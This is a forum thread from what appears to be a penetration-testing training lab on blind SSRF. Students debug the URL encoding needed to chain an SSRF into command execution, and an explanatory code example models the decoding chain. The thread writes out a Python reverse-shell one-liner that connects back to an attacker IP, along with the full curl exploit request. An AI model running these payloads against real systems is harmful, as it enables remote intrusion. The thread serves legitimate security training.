SERVER-SIDE ATTACKS Blind SSRF Exploitation Example

Hey, I’m trying to complete the Blind SSRF Exploitation Example, but I can’t create a reverse shell to my netcat. BTW, I’m using my local Kali machine, not Pwnbox, but on Pwnbox I’m having the same problem.

  1. I’ve encoded the Python reverse shell from the module twice.

Reverse shell before encoding:

export RHOST="10.10.15.192";export RPORT="9999";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

  2. Run netcat -nlvp 9999

  3. curl -i -s "http://10.129.41.183/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=python%2520-c%2520%2527import%2520sys%252Csocket%252Cos%252Cpty%253Bs%253Dsocket.socket%2528%2529%253Bs.connect%2528%2528os.getenv%2528%252210.10.15.192%2522%2529%252Cint%2528os.getenv%2528%25229999%2522%2529%2529%2529%2529%253B%255Bos.dup2%2528s.fileno%2528%2529%252Cfd%2529%2520for%2520fd%2520in%2520%25280%252C1%252C2%2529%255D%253Bpty.spawn%2528%2522%252Fbin%252Fsh%2522%2529%2527"

  4. I’m getting this response (“URL can’t contain control characters”):
    <html><body><h1>Resource: http://127.0.0.1:5000/runme?x=python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'</h1><a>URL can't contain control characters. '/runme?x=python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'' (found at least ' ')</a></body></html>

and nothing happens.

Can anyone help me please?

Ok, never mind. I finally did it. I don’t know why the author said that you need to encode the payload twice. You actually need to encode the payload 3 times.

3 Likes

Hi lackroy, I was struggling with the URL encoding. I solved the section using the URL encoder on the Academy page, but I was not able to replicate that kind of URL encoding. Did you encode 3 times using jq? Could you please show me how you did it?

thanks in advance

happy hacking

m477
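To see why the number of encodings matters, here is an added example (not from the thread or the module) that models the decode chain lackroy describes and the repeated encoding step m477 asks about: each forwarding server decodes its q parameter once, and Python's http.client refuses to send a request whose path still contains a space, which is exactly the error in the first post. The payload value and the two-forwarder chain are constructed stand-ins.

```python
import re
from urllib.parse import quote, unquote

# Pattern CPython's http.client uses to reject a request target before sending it;
# 0x20 (space) is in the range, which is what produced the error in this thread.
CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")

# Constructed, benign stand-in for a parameter value that contains spaces and quotes.
PAYLOAD = "x=python -c 'print(1)'"


def encode_n(text: str, n: int) -> str:
    """URL-encode `text` n times; each extra pass turns the previous pass's '%' into '%25'."""
    for _ in range(n):
        text = quote(text, safe="")
    return text


def deliver(encoded_param: str, forwarders: int = 2):
    """Simulate the chain: `forwarders` servers each decode their q= value once and pass it
    on; the last forwarder's HTTP client validates the path before the final request.
    Returns (sent, value_seen_by_final_service, rejection_reason)."""
    value = encoded_param
    for _ in range(forwarders):
        value = unquote(value)          # one query-string decode per hop
    hit = CONTROL_CHARS.search(value)   # http.client's check on the outgoing path
    if hit:
        return False, value, f"URL can't contain control characters (found at least {hit.group()!r})"
    return True, unquote(value), ""     # final service decodes its own parameter


if __name__ == "__main__":
    # Two forwarding hops (as in the thread): two encodings leave a literal space at the
    # client check, three encodings survive it and the final service sees the plain value.
    for n in (2, 3):
        sent, seen, why = deliver(encode_n(PAYLOAD, n))
        print(f"encoded {n}x -> {'sent' if sent else 'rejected'}: {why or seen}")
```

The rule that falls out is one encoding per decoding hop plus one for the final service; from the defender's side, each hop forwarding a user-supplied URL without an allowlist is what makes the chain reachable at all.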

Updating the external RHOST and port to tun0 and 9999, and the internal RHOST and RPORT to the victim’s IP and 8080, I’m still not able to obtain the shell?

export RHOST="<VPN/TUN IP>";export RPORT="";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'